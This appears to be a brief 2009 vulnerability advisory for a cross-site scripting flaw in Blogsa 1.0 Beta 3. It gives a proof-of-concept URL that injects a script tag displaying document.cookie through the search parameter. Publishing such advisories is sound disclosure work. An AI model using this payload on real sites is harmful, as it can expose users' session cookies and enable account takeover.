Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21416
HistoryMar 04, 2009 - 12:00 a.m.

Blogsa <= 1.0 Beta 3 XSS Vulnerability

2009-03-0400:00:00
vulners.com
26

###########################################################

Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability

Software Site: blogsa.net

Discovered by: Onur YILMAZ aka DJR

Blog: http://www.onuryilmaz.info

E-mail: contact<at>onuryilmaz<dot>info

###########################################################

XSS

http://localhost/Widgets.aspx?w=Search&amp;p=do&amp;searchText=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

Screen

http://img14.imageshack.us/img14/7803/12371681.jpg


This message was sent using IMP, the Internet Messaging Program.